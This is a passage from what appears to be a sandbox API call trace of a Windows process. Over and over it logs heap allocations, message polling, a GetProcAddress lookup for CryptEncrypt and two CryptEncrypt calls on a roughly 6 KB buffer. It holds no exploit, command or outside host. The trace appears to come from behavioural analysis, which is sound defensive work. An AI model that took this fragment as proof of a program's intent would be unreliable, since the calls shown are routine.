lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.641] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0212.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.641] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0212.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0212.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.642] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.643] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0212.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54198 [0212.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0212.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0212.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0212.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0212.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0212.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0212.644] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1893, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x1898) returned 1 [0212.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0212.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0212.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0212.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0212.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0212.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0212.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0212.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0212.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0212.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0212.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0212.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0212.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0212.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0212.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0212.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0212.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0212.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0212.650] CharLowerBuffW (in: lpsz="byte[6296]", cchLength=0xa | out: lpsz="byte[6296]") returned 0xa [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0212.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0212.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0212.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0212.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.651] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0212.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0212.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0212.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ae8 [0212.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0212.652] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0212.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54080 [0212.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0212.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0212.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0212.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0212.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0212.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0212.654] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f289f8*, pdwDataLen=0x8cef60*=0x1893, dwBufLen=0x1898 | out: pbData=0x2f289f8*, pdwDataLen=0x8cef60*=0x1898) returned 1 [0212.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0212.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0212.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0212.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0212.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0212.656] RtlAllocateHeap 